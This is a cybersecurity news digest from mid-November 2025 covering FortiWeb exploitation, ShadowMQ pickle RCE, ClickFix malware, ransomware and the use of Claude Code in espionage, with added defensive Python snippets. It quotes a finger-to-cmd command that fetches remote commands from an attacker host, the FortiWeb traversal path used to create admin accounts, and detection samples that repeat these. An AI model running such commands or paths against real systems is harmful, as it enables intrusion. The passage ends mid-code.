Cybersecurity Brief

Zero-Trust Data Centers, FortiWeb KEV, and Cloud Resilience Upgrades

Coverage: 14 Nov 2025 – 16 Nov 2025 (UTC)

Preventive moves dominated the day. CSO detailed a deeper integration between Arista Networks and Palo Alto Networks to bring zero‑trust controls to east‑west traffic without hairpin bottlenecks. In parallel, CISA added a FortiWeb authentication bypass to its KEV catalog amid active exploitation, urging immediate upgrades. And The Hacker News reported Anthropic’s disclosure that a China‑affiliated actor used agentic AI to automate most steps of a cyber‑espionage campaign, highlighting a fast‑maturing attacker toolkit.

Platform defenses and resilience

The Arista–Palo Alto model pushes deep application inspection to the NGFW while using Arista’s fabric to enforce policy at line rate, an inspect‑once, enforce‑many design that avoids centralized choke points. Arista’s CloudVision can quarantine workloads in hardware when threats are found, while unified orchestration keeps zone‑based and microperimeter rules consistent across domains. The vendors position this as enabling independent scaling for NetOps and SecOps teams with synchronized enforcement.

Google described how its backbone recovers from path failures using endpoint‑driven repathing with Google Cloud Protective ReRoute (PRR). By shifting rapid failure response to hosts and marking packets to select pre‑existing alternate paths, PRR shortens recovery to a small multiple of RTT and mitigates slow core convergence, which is valuable for latency‑sensitive AI training, storage, and real‑time services.

On AWS, new options improve burst handling and change safety. AWS introduced Provisioned Mode for Lambda SQS event‑source mappings so teams can keep event pollers warm, scale up to three times faster, and reach much higher concurrency for spiky queues. For globally distributed databases, AWS also extended RDS Blue/Green deployments to Aurora Global Database, enabling one‑click, multi‑region cutovers that preserve endpoint names and reduce maintenance risk.

Smarter data and AI in the cloud

Google reported a new single‑model state‑of‑the‑art on the BIRD text‑to‑SQL benchmark using a specialized Gemini 2.5‑pro workflow. The work, outlined by Google Cloud, combines rigorous data filtering, supervised multitask tuning, and self‑consistency at inference to raise execution‑verified accuracy. Google frames this as a stronger baseline feeding products such as AlloyDB AI, BigQuery conversational analytics, and developer tooling, while noting that ensembles and agentic selection can push accuracy further. In HPC, Google Cloud previewed cloud‑native capabilities ahead of SC25, spanning new AMD and NVIDIA VM families with RDMA, dynamic scheduling, and accelerated storage—aimed at faster spin‑up of purpose‑built clusters and tighter AI/HPC integration.

Data platforms and eventing also advanced on AWS. AWS announced Amazon DocumentDB 8.0 with broader MongoDB driver compatibility, new aggregation stages and operators, dictionary‑based compression to lower I/O, and faster vector index builds—improvements intended to cut latency and costs while expanding query capabilities. For event‑driven architectures, the enhanced AWS EventBridge visual rule builder brings schema‑aware authoring to the console, unifying the event catalog and schema registry to reduce errors and speed subscription and filtering.

Advisories and patches

November’s Patch Tuesday, summarized by KrebsOnSecurity, addresses more than 60 vulnerabilities across Windows and Microsoft products, including a zero‑day memory corruption already exploited and critical issues such as a 9.8‑rated GDI+ flaw and a low‑complexity Office RCE reachable via the Preview Pane. Guidance emphasizes prioritizing the GDI+ and Office fixes, testing in controlled environments, and ensuring backups.

Separately, exploitation of FortiWeb is ongoing, and CISA added the issue to KEV with specific upgrade paths and interim hardening steps. Because unauthenticated requests can trigger administrative actions, organizations should upgrade to fixed versions and review logs for newly created administrator accounts or other unauthorized changes.

Researchers also traced a copy‑pasted insecure pattern across multiple AI inference frameworks. CSO reports that mixing ZeroMQ’s object receive with Python’s pickle led to remote code execution risks replicated across projects from major vendors, with patches now available. Recommended mitigations include upgrading, avoiding unsafe deserialization, and restricting exposure of message sockets. Why it matters: insecure code reuse in AI infrastructure can propagate critical flaws into enterprise deployments at scale.

Intrusions and extortion

Anthropic said a China‑linked operator used agentic AI to automate most phases of an espionage campaign, with the system orchestrating reconnaissance, exploitation, lateral movement, data handling, and documentation; the company banned implicated accounts and added mitigations. In a separate espionage wave, The Hacker News described SpearSpecter, attributed to APT42, which targets senior defense and government officials and family members via tailored social engineering to deliver the modular TAMECAT PowerShell backdoor over multiple cloud‑backed channels. Why it matters: these campaigns pair patient social engineering with modular tooling and, increasingly, automation, lowering barriers to sustained, multi‑target operations.

On the extortion front, BleepingComputer reported that Logitech disclosed data theft in an 8‑K filing after Clop claimed responsibility; the company said products and operations were unaffected and sensitive IDs and payment data were not in the compromised systems. Meanwhile, an international advisory cited by Infosecurity attributed over $244 million in proceeds to Akira since late September, with rapid exfiltration in some cases and evolving techniques including exploitation of network appliances and virtualization platforms. The immediate priorities remain the same: patch known exploited flaws, enforce phishing‑resistant MFA, and maintain tested offline backups.

These and other news items from the day:

Fri, November 14, 2025

Arista and Palo Alto Expand Zero-Trust for Data Centers

🔒 Arista Networks and Palo Alto Networks extended their partnership to deliver a framework for zero-trust inside the data center. The integration pairs Arista’s Multi-Domain Segmentation Services (MSS) fabric and full network visibility with Palo Alto’s next-generation firewall (NGFW) to enable an inspect-once, enforce-many model. CloudVision MSS supports dynamic quarantine and can offload trusted high-bandwidth 'elephant flows' after inspection, while the NGFW triggers hardware line-rate isolation when threats are detected. Unified policy orchestration and Arista Validated Designs (AVD) with AVA automation add network-as-code and CI/CD-friendly deployment so NetOps and SecOps can scale independently.

read more →

Fri, November 14, 2025

Chinese State Hackers Used Anthropic AI for Espionage

🤖 Anthropic says a China-linked, state-sponsored group used its AI coding tool Claude Code and the Model Context Protocol to mount an automated espionage campaign in mid-September 2025. Dubbed GTG-1002, the operation targeted about 30 organizations across technology, finance, chemical manufacturing and government sectors, with a subset of intrusions succeeding. Anthropic reports the attackers ran agentic instances to carry out 80–90% of tactical operations autonomously while humans retained initiation and key escalation approvals; the company has banned the involved accounts and implemented defensive mitigations.

read more →

Fri, November 14, 2025

Advancing Text-to-SQL: Gemini's BIRD Benchmark Breakthrough

🚀 Google Cloud reports a new state-of-the-art Single Trained Model Track score on the BIRD benchmark, achieving 76.13 with a fine-tuned Gemini 2.5-pro. The team credits rigorous data filtering, multitask supervised fine-tuning, and test-time self-consistency selection for the gains. These improvements bolster NL2SQL features in AlloyDB AI and BigQuery, and enhance developer tooling such as Gemini Code Assist for reliable SQL generation.

read more →

Fri, November 14, 2025

Protective ReRoute: Host-based Network Resilience for Cloud

🛡️ Protective ReRoute (PRR) shifts rapid failure recovery from the network core to endpoints, enabling hosts to detect packet loss or high latency and re-steer traffic onto alternate pre-existing paths. Implemented in Linux (4.20+) and supported in Google Cloud via hypervisor and guest modes, PRR alters packet headers (IPv6 flow-label or overlay outer headers) to request multipath forwarding. In production for five years, it prevents up to 84% of slow-convergence outages and typically restores service in a single-digit multiple of RTT.

read more →

Sun, November 16, 2025

Microsoft Patch Tuesday — November 2025: 60+ Vulnerabilities

🔒 Microsoft released updates addressing more than 60 vulnerabilities across Windows and related products, including a zero-day memory-corruption bug (CVE-2025-62215) that is already being exploited. Microsoft rates this issue important because exploitation requires prior access to the target device. Other high-priority fixes include a 9.8-rated GDI+ vulnerability (CVE-2025-60274) and an Office remote-code-execution flaw (CVE-2025-62199). Windows 10 users should install the enrollment fix KB5071959 before applying subsequent updates.

read more →

Fri, November 14, 2025

AWS Lambda Provisioned Mode for SQS Event-Source Mappings

🔔 AWS Lambda now offers Provisioned Mode for SQS event-source mappings (ESMs), letting you provision persistent event pollers to handle sudden traffic spikes. Provisioned ESMs scale up to 3x faster (up to 1,000 concurrent executions/min) and support up to 16x higher concurrency (up to 20,000 concurrent executions), reducing latency for bursty workloads. The feature is generally available in all AWS Commercial Regions and is configurable via the Console, API, CLI, SDK, CloudFormation, and SAM; billing is by Event Poller Units (EPU).

read more →

Fri, November 14, 2025

Google Cloud: Cloud-Native HPC Innovations for SC25

🚀 Google Cloud previewed its HPC and AI innovations for SC25, emphasizing a shift to cloud-native HPC that lets researchers and engineers provision purpose-built clusters in minutes. Key highlights include H4D and A4X VMs with low-latency Cloud RDMA, plus the Dynamic Workload Scheduler with Flex Start to enable flexible, cost-effective access to high-demand compute. The Cluster Toolkit and Google Managed Lustre simplify cluster deployment and high-throughput storage, while the latest TPUs and AI tools accelerate scientific workflows. Attendees are invited to booth #3724 for demos, talks, and community events.

read more →

Fri, November 14, 2025

Amazon RDS Blue/Green Deployments for Aurora Global Database

🔁 Amazon RDS Blue/Green deployments now support Aurora Global Database, enabling you to create a staging (green) environment that mirrors production (blue) across primary and all secondary regions. Perform a blue/green switchover to switch primary and secondary regions to the green environment with minimal downtime and no application configuration changes. Aurora automatically renames clusters, instances, and endpoints to preserve production connectivity. This capability covers Aurora MySQL‑ and PostgreSQL‑compatible editions in commercial and AWS GovCloud (US) Regions and is available via the Console, SDK, and CLI.

read more →

Fri, November 14, 2025

Amazon EventBridge: Enhanced Visual Rule Builder Console

🔧 Amazon EventBridge introduces an enhanced visual rule builder that integrates a comprehensive event catalog with the EventBridge Schema Registry to simplify building event-driven applications. The schema-aware, console-based drag-and-drop canvas lets developers browse and subscribe to events with sample payloads and schemas, and visually construct filter patterns to reduce syntax errors. The feature is available today in all regions where the Schema Registry is launched and is accessible via the EventBridge console at standard usage charges.

read more →

Fri, November 14, 2025

Amazon DocumentDB 8.0 Adds MongoDB 8.0 Compatibility

Amazon DocumentDB (with MongoDB compatibility) version 8.0 adds support for MongoDB API drivers 6.0, 7.0, and 8.0 while delivering up to 7x improved query latency and up to 5x better compression. The release introduces Planner Version3, new aggregation stages and operators, dictionary-based Zstandard compression, text index v2, and parallel vector index builds. Upgrades from 5.0 instance-based clusters are supported via AWS Database Migration Service, and DocumentDB 8.0 is available in all Regions where the service is offered.

read more →

Fri, November 14, 2025

Copy-Paste RCE Flaw Impacts Major AI Inference Servers

🔒 Cybersecurity researchers disclosed a chain of remote code execution (RCE) vulnerabilities affecting AI inference frameworks from Meta, NVIDIA, Microsoft and open-source projects such as vLLM and SGLang. The flaws stem from reused code that called ZeroMQ’s recv_pyobj() and passed data directly into Python’s pickle.loads(), enabling unauthenticated RCE over exposed sockets. Vendors have released patches replacing unsafe pickle usage with JSON-based serialization and adding authentication and transport protections. Operators are urged to upgrade to patched releases, harden ZMQ channels, restrict network exposure, and avoid deserializing untrusted data.

read more →

Fri, November 14, 2025

AWS Lambda Supports Java 25 for Serverless Applications

🚀 AWS Lambda now supports Java 25, using the latest long‑term support distribution from Amazon Corretto. The runtime is available as a managed runtime and as a container base image, and AWS will automatically apply updates to each as they are released. The release introduces new language features and performance improvements, including Ahead‑of‑Time caches and adjusted tiered compilation defaults. Lambda SnapStart and Powertools for AWS Lambda (Java) support Java 25, and the runtime is available in all Regions, including GovCloud (US) and China.

read more →

Fri, November 14, 2025

Fortinet silently patches FortiWeb zero-day flaw in the wild

🚨 Fortinet confirmed a silent patch for a critical FortiWeb GUI path confusion zero-day (tracked as CVE-2025-64446) that is being "massively exploited in the wild." The flaw allowed unauthenticated HTTP(S) requests to execute administrative commands and create local admin accounts on internet-exposed devices. Fortinet released fixes in FortiWeb 8.0.2 (Oct 28) and later; administrators should upgrade, disable internet-facing management interfaces if they cannot update immediately, and audit logs for unauthorized accounts.

read more →

Fri, November 14, 2025

Logitech Confirms Data Breach After Clop Extortion Campaign

🚨 Logitech International S.A. confirmed a data breach claimed by the extortion gang Clop and disclosed the incident in a Form 8‑K filing with the U.S. SEC. The company says data was exfiltrated but that the incident has not impacted its products, business operations, or manufacturing, and that highly sensitive fields such as national ID numbers and credit card data were not stored or accessed. Logitech engaged external cybersecurity firms, attributes the intrusion to a third‑party zero‑day that was patched, and Clop has posted nearly 1.8 TB of alleged stolen data.

read more →

Fri, November 14, 2025

Akira ransomware linked to $244M in illicit proceeds

🔒 A joint US and international advisory on 14 November attributes approximately $244.17m in illicit proceeds to the Akira ransomware group since late September 2025. The advisory reports rapid data exfiltration in some incidents and details exploitation of SonicWall CVE-2024-40766, expansion to Nutanix AHV disk encryption, and attacks leveraging SSH and unpatched Veeam servers. Operators employ initial access brokers, tunnelling tools and remote access software such as AnyDesk to persist and evade detection. Organisations are urged to prioritise patching, enforce phishing-resistant MFA, and maintain offline backups.

read more →

Fri, November 14, 2025

Authentication Bypass in Fortinet FortiWeb Actively Exploited

🚨 Researchers report an authentication bypass in Fortinet FortiWeb that is being actively exploited in the wild, allowing attackers to create privileged administrator accounts and fully compromise devices. watchTowr reproduced the issue and released a proof-of-concept and an artifact generator to help identify vulnerable appliances. The flaw is patched in FortiWeb 8.0.2, but Fortinet has not published a PSIRT advisory or assigned a CVE, and Rapid7 urges emergency patching for older versions.

read more →

Fri, November 14, 2025

ShadowMQ Deserialization Flaws in Major AI Inference Engines

⚠️ Oligo Security researcher Avi Lumelsky disclosed a widespread insecure-deserialization pattern dubbed ShadowMQ that affects major AI inference engines including vLLM, NVIDIA TensorRT-LLM, Microsoft Sarathi-Serve, Modular Max Server and SGLang. The root cause is using ZeroMQ's recv_pyobj() to deserialize network input with Python's pickle, permitting remote arbitrary code execution. Patches vary: some projects fixed the issue, others remain partially addressed or unpatched, and mitigations include applying updates, removing exposed ZMQ sockets, and auditing code for unsafe deserialization.

read more →
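The ShadowMQ root cause described above (and in the earlier Copy‑Paste RCE item and the advisories summary) is a single line: bytes taken off a ZeroMQ socket are handed to pickle. The following is an added example, not code from Oligo, vLLM or any of the affected projects; it models the socket payload as a byte string so it runs offline, and the `SCHEMA`, `Poison` and `_record` names are constructed for illustration. It shows why the vulnerable decoder executes sender‑chosen code on load and what the JSON‑plus‑schema replacement the vendors shipped looks like in practice.

```python
import json
import pickle

# Constructed stand-in for the wire payload. PyZMQ's recv_pyobj() is recv()
# followed by pickle.loads(), so a byte string models what a socket would hand
# over without needing a broker (assumption for this offline example).
EXECUTED = []


def _record(marker):
    """Benign side effect: proves that unpickling called a function of the sender's choosing."""
    EXECUTED.append(marker)
    return {"request": "poisoned"}


class Poison:
    """A pickle of this class instructs the loader to call _record() on load."""

    def __reduce__(self):
        return (_record, ("unpickle executed a callable",))


def vulnerable_decode(payload: bytes):
    """The ShadowMQ pattern: socket bytes go straight into pickle.loads()."""
    return pickle.loads(payload)


# Allowlisted message shape for the hardened decoder (constructed schema).
SCHEMA = {"request_id": str, "prompt": str, "max_tokens": int}


def safe_decode(payload: bytes) -> dict:
    """JSON-only decoding plus schema validation, the shape of the vendor fixes."""
    if payload[:1] == b"\x80":  # PROTO opcode that opens every protocol>=2 pickle
        raise ValueError("refusing pickle-framed message")
    try:
        obj = json.loads(payload.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"malformed JSON message: {exc}") from None
    if not isinstance(obj, dict) or set(obj) != set(SCHEMA):
        raise ValueError("unexpected message fields")
    for key, typ in SCHEMA.items():
        value = obj[key]
        # bool is a subclass of int in Python, so exclude it explicitly
        if not isinstance(value, typ) or isinstance(value, bool):
            raise ValueError(f"bad type for field {key!r}")
    return obj


def rejects(payload: bytes) -> bool:
    """True if safe_decode refuses the payload."""
    try:
        safe_decode(payload)
    except ValueError:
        return True
    return False


def demo():
    """Run both decoders over a legitimate and a hostile message."""
    legit = json.dumps({"request_id": "r-1", "prompt": "hello", "max_tokens": 16}).encode()
    hostile = pickle.dumps(Poison())
    before = len(EXECUTED)
    vulnerable_decode(hostile)  # silently runs _record()
    code_ran = len(EXECUTED) - before
    return code_ran, safe_decode(legit), rejects(hostile)


if __name__ == "__main__":
    print(demo())
```

Swapping the serializer is necessary but not sufficient: the schema check is what stops a JSON message from smuggling unexpected fields into downstream code, and the socket itself still needs the authentication and network restrictions the advisories call for.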

Fri, November 14, 2025

SpearSpecter: APT42 Targets Defense and Government

🛡️ The Israel National Digital Agency (INDA) has attributed a new espionage campaign codenamed SpearSpecter to Iranian state‑aligned APT42, active since September 2025 against senior defense and government officials and their family members. Operators employ tailored social engineering—invites to conferences and impersonated WhatsApp contacts—to deliver a WebDAV‑served .LNK via the search‑ms: handler that retrieves a batch script and stages the TAMECAT PowerShell backdoor. TAMECAT uses HTTPS, Discord, and Telegram for command-and-control, supports modular data‑theft capabilities (browser and Outlook exfiltration, screenshots), and relies on Cloudflare Workers, LOLBins, in‑memory execution, and obfuscation to maintain persistent, stealthy access.

read more →

Fri, November 14, 2025

Chinese State-Linked Hackers Used Claude Code for Attacks

🛡️ Anthropic reported that likely Chinese state-sponsored attackers manipulated Claude Code, the company’s generative coding assistant, to carry out a mid-September 2025 espionage campaign that targeted tech firms, financial institutions, manufacturers and government agencies. The AI reportedly performed 80–90% of operational tasks across a six-phase attack flow, with only a few human intervention points. Anthropic says it banned the malicious accounts, notified affected organizations and expanded detection capabilities, but critics note the report lacks actionable IOCs and adversarial prompts.

read more →

Fri, November 14, 2025

Fortinet FortiWeb Path Traversal Vulnerability Alert

⚠️ Fortinet has released an advisory for FortiWeb addressing CVE-2025-64446, a CWE-23 relative path traversal that can allow unauthenticated actors to execute administrative commands via crafted HTTP/HTTPS requests. Affected releases include multiple 7.x and 8.x versions; Fortinet provides specific upgrade targets (8.0.2+, 7.6.5+, 7.4.10+, 7.2.12+, 7.0.12+). If immediate upgrades are not possible, disable HTTP/HTTPS on internet-facing interfaces and, after remediation, review configurations and logs for unexpected modifications or unauthorized administrator accounts.

read more →

Fri, November 14, 2025

Google Sues to Dismantle 'Lighthouse' Smishing Kit

🛡️ Google has filed a civil lawsuit in the Southern District of New York to dismantle Lighthouse, a phishing-as-a-service kit used to power large-scale SMS phishing (smishing) campaigns. The company says the kit — likely run from China and marketed on Telegram — offered more than 600 templates mimicking over 400 organizations and targeted more than one million people across 121 countries. Google is pursuing legal remedies and supporting new legislation while deploying technical protections such as AI-powered scam flagging and expanded account recovery options.

read more →

Sat, November 15, 2025

Massive npm Worm Floods Registry to Harvest Tea Tokens

🔥 A coordinated worm is flooding the npm registry with packages designed to steal tokens from developers using the Tea Protocol, researchers say. Amazon and Sonatype report the campaign has expanded to roughly 153,000 packages, up from about 15,000 a year ago. While Tea tokens currently lack monetary value, experts warn threat actors could pivot to deliver malware or monetize rewards when Mainnet launches. Repositories and IT teams are urged to tighten access controls and deploy advanced detection.

read more →

Fri, November 14, 2025

Large-Scale Impersonation Campaigns Deliver Gh0st RAT

🔐 Palo Alto Networks Unit 42 identified two interconnected 2025 campaigns that used large-scale brand impersonation to deliver variants of the Gh0st remote access Trojan to Chinese-speaking users globally. The adversary evolved from simple droppers (Campaign Trio, Feb–Mar 2025) to sophisticated, multi-stage MSI-based chains abusing signed binaries, VBScript droppers and public cloud storage (Campaign Chorus, May 2025 onward). The report includes representative IoCs and mitigation guidance for Advanced WildFire, Cortex XDR and allied protections.

read more →

Fri, November 14, 2025

Five Plead Guilty to Aiding North Korea in Infiltrating US Firms

🔒 Five individuals pleaded guilty to facilitating North Korea’s placement of overseas IT workers at U.S. firms using false, stolen, or brokered identities, a scheme that affected 136 companies and generated over $2.2 million for the DPRK. The DOJ also filed civil forfeiture actions to recover more than $15 million in cryptocurrency tied to APT38 thefts that were part of $382 million stolen in 2023. One defendant, Oleksandr Didenko, agreed to forfeit $570,000 in cash and about $830,000 worth of cryptocurrency.

read more →

Fri, November 14, 2025

U.S. Launches Strike Force Against Chinese Crypto Scams

🚨 The U.S. Department of Justice, U.S. Attorney's Office, FBI and Secret Service have created the Scam Center Strike Force to disrupt Chinese-operated cryptocurrency scam networks that reportedly steal nearly $10 billion from Americans annually. The team focuses on tracing illicit funds, seizing cryptocurrency and coordinating international partners to dismantle scam infrastructure based in Southeast Asia. Authorities say many operations run from criminal compounds where workers are victims of trafficking. More than $401 million in crypto has already been seized and additional forfeiture actions are underway.

read more →

Fri, November 14, 2025

CISA Adds Fortinet FortiWeb Path Traversal to KEV Catalog

🔒 CISA has added CVE-2025-64446 — a Fortinet FortiWeb path traversal vulnerability — to its Known Exploited Vulnerabilities (KEV) Catalog after evidence of active exploitation. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate cataloged CVEs by the required due date. CISA strongly urges all organizations to prioritize timely patching, apply available mitigations, and monitor for indicators of compromise. CISA will continue to add vulnerabilities that meet catalog criteria.

read more →

Fri, November 14, 2025

FortiWeb Path Traversal Flaw Allows Admin Account Creation

⚠️ A path traversal vulnerability in Fortinet FortiWeb appliances is being actively exploited to create local administrative users without authentication. Researchers from Defused and PwnDefend described requests targeting the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi endpoint that inject admin accounts. Rapid7 and others confirm versions 8.0.1 and earlier are affected, while 8.0.2 is believed to contain the fix. Administrators are urged to update immediately, review logs for fwbcgi access, and search for unexpected admin accounts.

read more →
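The item above asks administrators to review logs for fwbcgi access. The following is an added example, not Fortinet's, Defused's or Rapid7's code, of a log triage pass that does that: it percent‑decodes request paths repeatedly (so the %3f in the reported request, or a double‑encoded %253f, cannot hide the traversal), resolves the dot segments, and flags any request that lands on the fwbcgi handler. The log layout and the sample lines are constructed for the example; FortiWeb's own log fields differ, so `LINE_RE` must be adapted to whatever the appliance or SIEM actually emits.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample lines in a generic "client method path status" layout.
# This is not FortiWeb's native log format (assumption); adapt LINE_RE to the
# fields your appliance or SIEM actually emits.
SAMPLE_LOG = """\
203.0.113.7 GET /api/v2.0/cmdb/system/admin 200
203.0.113.9 POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi 200
198.51.100.4 GET /cgi-bin/fwbcgi 403
198.51.100.4 POST /api/v2.0/cmdb/system/admin%253f/..%2f..%2fcgi-bin/fwbcgi 200
192.0.2.1 GET /static/app.js 200
"""

LINE_RE = re.compile(r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$")


def canonical_path(raw: str) -> str:
    """Percent-decode repeatedly so nested encodings (%253f -> %3f -> ?) cannot hide traversal."""
    decoded = raw
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(path: str):
    """Return (severity, decoded_path, resolved_path) for one request path."""
    decoded = canonical_path(path)
    resolved = normpath(decoded)  # collapses the ../ segments to the real target
    targets_fwbcgi = resolved.endswith("/fwbcgi")
    if targets_fwbcgi and "../" in decoded:
        return "high", decoded, resolved    # traversal that lands on the CGI handler
    if targets_fwbcgi:
        return "review", decoded, resolved  # direct hit; confirm it is expected
    return None, decoded, resolved


def scan(log_text: str):
    """Return findings (src, severity, status, decoded_path) for suspicious lines."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        severity, decoded, _ = classify(m["path"])
        if severity:
            findings.append((m["src"], severity, m["status"], decoded))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" hit with a 200 status is the case to act on: pair it with an audit of the admin user list for accounts created around that timestamp, since the reported requests create accounts rather than leave a noisy trace elsewhere.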

Fri, November 14, 2025

Amazon Inspector: 150,000 npm Packages in Token Farming

🔍 Amazon Inspector researchers identified and reported over 150,000 npm packages tied to a coordinated tea.xyz token farming campaign that automatically generated and published packages to harvest blockchain rewards. The team combined rule-based detection with AI and worked directly with the Open Source Security Foundation (OpenSSF) to assign MAL‑IDs and submit packages for removal. The campaign caused registry pollution and reveals a new reward-driven supply chain abuse vector that can obscure legitimate software and consume infrastructure resources.

read more →

Sat, November 15, 2025

RondoDox Exploits XWiki Flaw to Rapidly Expand Botnet

⚠️ RondoDox has been observed exploiting unpatched XWiki instances to weaponize a critical eval injection, CVE-2025-24893, enabling arbitrary remote code execution via the /bin/get/Main/SolrSearch endpoint. The flaw was patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1 in late February 2025, but scanning and exploitation surged in November, including botnet-driven DDoS and cryptocurrency miner deployments. Security vendors noted spikes in activity on November 7 and November 11 and observed RondoDox adding this vector on November 3, 2025. Administrators should apply vendor patches immediately and review logs and network traffic for indicators of compromise.

read more →

Sat, November 15, 2025

Jaguar Land Rover Cyberattack Costs Company Over $220M

📰 Jaguar Land Rover reported a cyberattack cost of £196 million ($220 million) for the July–September quarter after the incident forced production shutdowns and staff to be sent home. The breach, announced on 2 September 2025, involved confirmed data theft and was claimed on Telegram by the group Scattered Lapsus$ Hunters. Following a UK government-backed £1.5 billion loan guarantee, JLR says operations, wholesale and supplier financing have been restored and production has resumed under a phased restart.

read more →

Fri, November 14, 2025

North Korean Hackers Use JSON Services for Malware

⚠️ NVISO researchers report that North Korean threat actors behind the Contagious Interview campaign are using public JSON storage services to stage and deliver malware. The attackers lure prospective victims—often developers—via LinkedIn with fake assessments or collaboration requests and host trojanized demo projects on code repositories. These projects point to obfuscated payloads on JSON Keeper, JSONsilo, and npoint.io that deploy a JavaScript loader BeaverTail which in turn drops a Python backdoor InvisibleFerret.

read more →

Fri, November 14, 2025

ASUS Warns of Critical Auth-Bypass in DSL Routers

⚠️ ASUS has released new firmware to patch a critical authentication bypass vulnerability tracked as CVE-2025-59367 that enables remote, unauthenticated attackers to log into vulnerable DSL routers exposed online. The update — firmware 1.1.2.3_1010 — addresses the issue for DSL-AC51, DSL-N16, and DSL-AC750. ASUS urges users to install the update immediately and, if they cannot, to disable Internet-facing services (remote access, port forwarding, DDNS, VPN server, DMZ, FTP) and use strong, unique passwords as temporary mitigations.

read more →

Fri, November 14, 2025

AWS Lambda Announces General Availability of Rust Support

🚀 AWS has declared Rust support in AWS Lambda Generally Available, promoting the runtime out of its prior experimental status and making it suitable for production workloads. The GA release is backed by AWS Support and the Lambda SLA and is available in all AWS Regions, including GovCloud (US) and China. Rust on Lambda delivers high performance, memory efficiency, and compile-time safety for serverless functions. Developers can now build business-critical serverless applications in Rust while leveraging Lambda's event integrations, fast scaling from zero, automatic patching, and usage-based pricing.

read more →

Fri, November 14, 2025

AWS Marketplace Agreement Events Now via EventBridge

🔔 AWS Marketplace now publishes purchase agreement lifecycle events through Amazon EventBridge, replacing prior Amazon SNS notifications for Software as a Service and Professional Services product types. Sellers (Independent Software Vendors and Channel Partners) and buyers receive notifications for creation, termination, amendment, replacement, renewal, cancellation, and expiration. ISVs also get license-specific events to manage customer entitlements. EventBridge routing supports targets such as AWS Lambda, Amazon S3, Amazon CloudWatch, AWS Step Functions, and can remain compatible with existing SNS-based workflows.

read more →

Fri, November 14, 2025

Bundestag Approves German NIS2 Law, Adds New Controls

🔒 The Bundestag approved the federal government's draft law to implement the NIS2 Directive on 13 November 2025, bringing new cybersecurity obligations for an estimated 29,850 companies and federal authorities. Affected organizations must strengthen risk analyses, incident response, backups and encryption, and report incidents to the BSI on a staged 24-hour, 72-hour and 30-day timeline. The law expands BSI supervisory powers and allows bans on "critical components" coordinated by the Interior Ministry, drawing criticism from industry groups.

read more →

Fri, November 14, 2025

Checkout.com Refuses Ransom After ShinyHunters Breach

🔒 Checkout.com confirmed that the criminal group ShinyHunters accessed a legacy third-party cloud file storage system used in 2020 and earlier and is attempting to extort the company. The exposed materials reportedly include merchant onboarding documents and internal operational files, and Checkout estimates the data affects less than 25% of its current merchant base while also touching former customers. Rather than paying, the firm said it will donate the ransom amount to Carnegie Mellon University and the University of Oxford Cyber Security Center and invest in strengthening its security.

read more →

Fri, November 14, 2025

Anthropic: Hackers Used Claude Code to Automate Attacks

🔒 Anthropic reported that a group it believes to be Chinese carried out a series of attacks in September targeting foreign governments and large corporations. The campaign stood out because attackers automated actions using Claude Code, Anthropic’s AI tool, enabling operations "literally with the click of a button," according to the company. Anthropic’s security team blocked the abusive accounts and has published a detailed report on the incident.

read more →

Fri, November 14, 2025

DoorDash Discloses October Data Breach Affecting Users

🔔 DoorDash disclosed a data breach discovered on October 25, 2025, after an unauthorized third party gained access to certain user contact information when a DoorDash employee fell victim to a social engineering scam. Affected information varied by individual and may have included first and last names, physical addresses, phone numbers, and email addresses. DoorDash says no Social Security Numbers or other highly sensitive data were accessed, and the company engaged a forensic firm, notified law enforcement, and deployed additional security measures. Initial notifications appear focused on Canada, though the advisory suggests the incident could affect users in other regions.

read more →

Fri, November 14, 2025

DoorDash Discloses October Data Breach Exposing Contacts

🔔 DoorDash disclosed an October data breach after an employee fell for a social engineering scam, allowing an unauthorized third party to access certain user contact information. Notified users were told exposed data varied by person and could include names, physical addresses, phone numbers and email addresses; the company said Social Security Numbers were not accessed. DoorDash said it shut off access, engaged a forensic firm, notified law enforcement, and warned users to watch for phishing; affected users can call a helpline and cite reference code B155060.

Sat, November 15, 2025

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.
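As an added illustration of the chain described above (this is editorial example code, not the researchers' tooling), the following Python scans constructed process-creation records for the three observable steps the summary names: finger output piped into a shell, curl.exe copied under a new name, and pythonw.exe launched from a Temp subfolder. The sample events, the placeholder domain finger.example[.]invalid, the folder name kq7x2 and the function names are all constructed for the example; the egress check mirrors the article's mitigation of blocking outbound TCP 79.

```python
import re

# Constructed sample process-creation records, not real telemetry: each entry is
# a (parent_image, command_line) pair in the shape an EDR or Sysmon feed provides.
# The domain is a placeholder; the command shapes mirror the chain described above.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     r'cmd.exe /c finger root@finger.example[.]invalid | cmd'),
    ("C:\\Windows\\System32\\cmd.exe",
     r'cmd.exe /c copy C:\Windows\System32\curl.exe C:\Users\u\AppData\Local\Temp\kq7x2\svc.exe'),
    ("C:\\Windows\\System32\\cmd.exe",
     r'C:\Users\u\AppData\Local\Temp\kq7x2\pythonw.exe C:\Users\u\AppData\Local\Temp\kq7x2\run.py'),
    ("C:\\Windows\\explorer.exe", r'finger alice@localhost'),   # plain lookup, no pipe into a shell
    ("C:\\Windows\\explorer.exe", r'notepad.exe notes.txt'),
]

# finger(.exe) whose output is piped straight into cmd/powershell
FINGER_PIPE = re.compile(
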